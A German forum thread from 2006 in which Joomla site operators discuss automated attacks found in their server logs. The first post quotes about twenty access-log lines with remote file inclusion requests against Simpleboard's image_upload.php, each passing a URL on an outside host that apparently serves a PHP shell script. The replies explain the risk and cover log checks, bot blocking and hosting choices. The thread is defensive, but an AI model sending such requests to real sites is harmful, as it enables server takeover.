Thema: Dreister Hackversuch über Simpleboard

Hallo!

Ich habe heute mal aus Jux und Dollerei meine Logfiles durchgeschaut und bin auf folgendes gestoßen:

202.8.87.211 - - [03/Oct/2006:00:29:17 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://foro-bot.webcindario.com/baba.txt? HTTP/1.1" 404 1081 "-" "libwww-perl/5.79" ""

193.138.221.190 - - [03/Oct/2006:01:15:27 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.803" ""

80.237.132.50 - - [03/Oct/2006:01:15:27 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.803" ""

85.214.16.102 - - [03/Oct/2006:01:15:28 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.803" ""

62.168.63.142 - - [03/Oct/2006:01:15:29 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.65" ""

62.214.98.109 - - [03/Oct/2006:01:16:07 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.805" ""

80.228.203.99 - - [03/Oct/2006:01:16:08 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.803" ""

216.237.124.18 - - [03/Oct/2006:01:16:12 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.79" "

80.228.203.99 - - [03/Oct/2006:01:16:32 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.803" "

72.22.71.81 - - [03/Oct/2006:01:16:55 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.76" "

209.59.156.2 - - [03/Oct/2006:01:17:00 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.805" "

204.92.122.105 - - [03/Oct/2006:01:17:00 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.65" "

69.42.69.208 - - [03/Oct/2006:01:17:01 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.79" "

209.59.152.2 - - [03/Oct/2006:01:17:03 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.805" "

212.57.234.27 - - [03/Oct/2006:01:17:05 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.65" ""

72.21.41.146 - - [03/Oct/2006:01:17:09 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.805" "

201.12.156.20 - - [03/Oct/2006:01:17:10 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.79" ""

209.59.156.2 - - [03/Oct/2006:01:17:11 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.805" ""

209.249.12.7 - - [03/Oct/2006:01:17:13 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.803" ""

80.237.132.50 - - [03/Oct/2006:01:17:14 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.803" ""

80.237.132.50 - - [03/Oct/2006:01:17:18 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.803" ""

212.128.15.42 - - [03/Oct/2006:01:17:23 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.med.ualberta.ca/calendar/cmd.gif? HTTP/1.1" 404 1081 "-" "libwww-perl/5.805" ""

Da ich das Simpleboard nicht habe, hatte er natürlich keinen Erfolg. Aber interessant zu sehen, wie hartnäckig da versucht wird irgendwas hochzuladen. Schön im 2 Sekunden Takt. Weiss einer was das überhaupt bewirken soll?

Bis jetzt kam kein weiterer Angriff auf das Simpleboard.

Einen schönen Morgen noch!!

Gruß,
billalein

Zitat von billalein

Da ich das Simpleboard nicht habe, hatte er natürlich keinen Erfolg. Aber interessant zu sehen, wie hartnäckig da versucht wird irgendwas hochzuladen. Schön im 2 Sekunden Takt. Weiss einer was das überhaupt bewirken soll?

Gruß,
billalein

Im Erfolgsfall hättest Du jetzt eine php-shell und andere Leckereien auf Deinem Space, die beliebige Manipulation, im Extremfall (schlecht konfigurierter Server) root-Zugriff aufs komplette System ermöglichen.

Hat denn auch jemand eine Idee, was ich tun kann, wenn mein Hoster mod_rewrite nicht erlaubt?
(Hab zwar nicht Simpleboard installiet, aber die ständigen libWWW-Angriffe will ich doch gern vermeiden.)

Gruß,
Friedel

Dannke für den Tip zu Bot-Trap. Habe mich mal gleich registriert.

Und einen Hoster-Wechsel muß ich wohl eh bald in Angriff nehmen, da mein derzeitiger fast mehr Down- als Up-Time hat.
... war halt preiswert bei einem umfangreichem Paket ...

Gruß,
Friedel

Zitat von billalein

Hallo!

Ich habe heute mal aus Jux und Dollerei meine Logfiles durchgeschaut und bin auf folgendes gestoßen:
[...]

Willkommen in der Realität ;-)

Damit wirst Du als Betreiber einer joomla Seite immer zu tun haben.
Je nach bekanntheitsgrad mal mehr und mal weniger.
Ein "tail -1500 access_log | grep "=http:" " bringt bei mir manchmal bis zu 200 Versuche. Je nach dem ob gerade Wochennde ist oder Schulferien sind.
Das sind automatisierte Abfragen meistens werden die Seiten aus Listen heraus aufgerufen die von Suchmaschinen stammen.
Wenn joomla aktuell ist und der Server richtig eingerichtet funktioniert diese Masche nicht mehr. Auch ein grund - wenn nicht DER Grund überhaupt warum man joomla auf dafür optimiertem Webspace laufen lassen sollte. Auch wenns einige cent mehr im Mona t sind.

Edit: Logs ließt man nicht aus "jux und dollerei" - das macht man regelmäßig. Auch wenns keinen Spass macht.
Mit einigen Tools kann man sich die Arbeit allerdings erleichtern. Die meisten sind bei Linux übrigends schon mit dabei.

Hallo!

Durch einen Hosterwechsel sind sogut wie keine Angriffe mehr zu verzeichnen. Anscheinend lag es auch an der Serverconfig.

Wollen wir hoffen das es auch so bleibt!

das ist auch meine frage,

wie stellt man die configuration ein, damit alles schön dicht ist.
ich kenne mich nicht aus und hab auch keine ahnung von tiny editor,
htaccess. als webhosting bin ich bei 1&1. ich habe die seite erst vor
zwei tagen online gestellt und müsste sie jetzt mal richtig einstellen,
damit diese manipulation da nicht greift.

wer kann mir helfen, quasi schritt für schritt